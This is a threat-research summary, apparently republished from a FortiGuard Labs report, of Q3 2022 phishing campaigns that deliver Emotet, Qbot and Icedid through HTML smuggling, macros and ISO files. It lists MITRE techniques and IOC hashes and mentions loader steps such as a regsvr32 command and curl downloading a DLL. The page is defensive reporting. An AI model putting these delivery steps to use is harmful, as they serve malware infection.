Threat Research

Delivery of Malware: A Look at Phishing Campaigns in Q3 2022 | FortiGuard Labs

Securonix

Fortinet FortiGuard Labs analyzes phishing-driven malware campaigns in Q3 2022, highlighting the use of HTML Smuggling, Excel 4.0 macros, Word VBA macros, and ISO image delivery to drop Emotet, Qbot, and Icedid. The report details multiple delivery chains and IOCs, and outlines Fortinet protections and user-awareness approaches to mitigate these threats. hashtags: #Emotet #Qbot #Icedid #HTMLSmuggling #ISOFiles

Keypoints

  • Phishing emails remain the primary infection vector, often delivering malicious attachments or links to download malware.
  • HTML Smuggling is used to bypass restrictions and deliver password-protected ZIPs that unzip on the victim’s device.
  • Emotet campaigns in Q3 2022 reuse Excel 4.0 macros to download and execute payloads.
  • A Word document with VBA macros drops an Icedid DLL and uses security prompts to entice enabling content.
  • ISO files are a popular container for delivering Qbot and Icedid, employing LNK, BAT, JS, and CHM/script-based execution chains.
  • Fortinet protections (CDR, FortiEDR, FortiMail, Antivirus, awareness training) mitigate these threats, and a set of IOCs is provided for detection.

MITRE Techniques

  • [T1566.001] Phishing – Attachment – “phishing emails… include a malicious file attachment…”
  • [T1566.002] Phishing – Link – “a malicious site that downloads a malicious file.”
  • [T1027] Obfuscated/Compressed Files and Information – “obfuscated scripts” used to obfuscate execution in the Qbot chain.
  • [T1064] Scripting – Excel 4.0 macros used to download and execute payloads (Excel macro as downloader).
  • [T1059.005] Visual Basic – Word VBA macros dropping an Icedid DLL (Word document with VBA macros).
  • [T1218.011] Signed Binary Proxy Execution: Rundll32 – “rundll32.exe” is called to load this malicious DLL file.
  • [T1218.012] Signed Binary Proxy Execution: Regsvr32 – “regsvr32.exe 102755.dll” loads the malicious DLL.
  • [T1574.001] DLL Search Order Hijacking – DLL loaded from ISO/container path instead of Windows directory.
  • [T1059.003] Windows Command Shell – Use of “curl.exe” to download a malware DLL and execute it with subsequent commands.
  • [T1204.002] User Execution: Malicious File – LNK file execution leading to BAT/JS/TXT workflows to run the DLL.
  • [T1027] Obfuscated/Compressed Files and Information – obfuscated scripts in the Qbot ISO delivery chain.

Indicators of Compromise

  • [SHA256] Malicious sample (SHA256) – ca15f68eb58e61313dda1d34c4d20f1582b8506481436c1bfd5c354922ddf7e0, 84e281b7755da1f89e3ed2b109556002c40547292deed3f7a7754707c69396fd, and 6 more hashes
  • [SHA256] Malware payload (SHA256) – 84197619db6a80282ae8d96e40e107de9596a020cd9397f780c07fab3c4576d7, 2c87388d5f2eba48cd479c05c837a5e4a661927fc0ade00b986489a449ad0e3c, and 5 more hashes
  • [File names] DLLs and executables dropped/executed by these campaigns – e.g., xxx.dll, 102755.dll, app.dll, WindowsCodecs.dll
  • [File path] Example drop locations and loader paths – c:ProgramDataxxx.dll; C:WindowsSysWOW64regsvr32.exe 102755.dll

Read more: https://www.fortinet.com/blog/threat-research/delivery-of-malware-phishing-campaigns-in-q3-2022

SHARE THIS STORY

WhatsAppX (Twitter)TelegramBlueskyFacebookLinkedInThreadsEmailPrint